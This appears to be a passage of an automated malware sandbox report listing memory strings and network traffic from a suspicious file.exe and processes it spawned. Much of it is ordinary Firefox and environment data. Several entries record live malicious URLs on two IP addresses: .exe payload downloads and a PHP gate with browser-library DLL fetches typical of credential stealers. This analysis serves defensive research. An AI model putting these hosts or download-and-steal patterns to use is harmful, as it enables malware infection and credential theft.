                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"^ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000011.00000002.2449212670.000001F2F2540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000011.00000002.2449212670.000001F2F2540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationz9 equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000012.00000003.2585100951.000001E95D137000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2522438371.000001E95D137000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2548119909.000001E95D137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2444089246.00000244DF180000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2388200818.00000244DF17E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2696734875.000001E95AE6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2691821176.000001E95AE66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2596662309.000001E95AE6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD650000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2381619693.00000244DD66D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2427010220.00000244DD682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: =::=::\=C:=C:\Users\user\DesktopALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Users\user\DesktopchromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;;C:\ProgramData\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowse equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2410452799.00000244DD5A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Users\user\DesktopchromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;;C:\ProgramData\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsFz5 equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000011.00000002.2449212670.000001F2F2540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation89 equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\Desktop\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"Winsta0\Default equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000011.00000002.2449212670.000001F2F2540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default>9 equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD659000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2410452799.00000244DD5A4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2410452799.00000244DD5A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2410452799.00000244DD5A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2442562466.00000244DF170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000012.00000003.2741671716.000001E956945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2804070755.000001E956945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2585100951.000001E95D137000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2522438371.000001E95D137000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2548119909.000001E95D137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comZ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD67B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2381619693.00000244DD66D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2396846104.00000244DD67A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
                          Source: userCFHCBKKFIJ.exe, 00000009.00000003.2373571149.0000000002270000.00000004.00000020.00020000.00000000.sdmp, userCFHCBKKFIJ.exe, 00000009.00000003.2373387655.0000000002457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2696734875.000001E95AE6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2691821176.000001E95AE66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2596662309.000001E95AE6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2588071863.000001E95CCBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.comb equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2691821176.000001E95AEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000012.00000003.2801044011.000001E959B44000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2741599572.000001E956949000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739178282.000001E959B44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                          Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                          Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: example.org
                          Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                          Source: global trafficDNS traffic detected: DNS query: accounts.youtube.com
                          Source: global trafficDNS traffic detected: DNS query: play.google.com
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: services.addons.mozilla.org
                          Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                          Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
                          Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                          Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: support.mozilla.org
                          Source: global trafficDNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
                          Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                          Source: firefox.exe, 00000012.00000003.3085817538.000001E95A38D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe
                          Source: file.exe, 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exe00Start4http://77.91.77.81/soka/random.exe00Start2CURRENTRENTs---JKEBF
                          Source: file.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exeJc
                          Source: file.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/cost/go.exexc
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exe
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/mine/amadka.exex
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/soka/random.exe
                          Source: file.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/soka/random.exe:R
                          Source: file.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/soka/random.exeFP
                          Source: file.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.91.77.81/soka/random.exeo(B
                          Source: file.exe, 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmp, 4ddf12fb51.exe, 0000002F.00000002.2934283237.000000000078D000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A42000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A49000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php$
                          Source: file.exe, 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php.exe
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php/
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php4
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpV
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpc
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpeD
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phph
                          Source: file.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpkN-
                          Source: file.exe, 00000000.00000002.2564756762.0000000026D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phplegram
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.00000000007C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpv
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.000000000078D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpx
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/6
                          Source: file.exe, 00000000.00000002.2525036759.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
                          Source: file.exe, 00000000.00000002.2525036759.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
                          Source: file.exe, 00000000.00000002.2525036759.000000000086C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2525036759.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
                          Source: file.exe, 00000000.00000002.2525036759.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dllll
                          Source: file.exe, 00000000.00000002.2525036759.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dllr
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
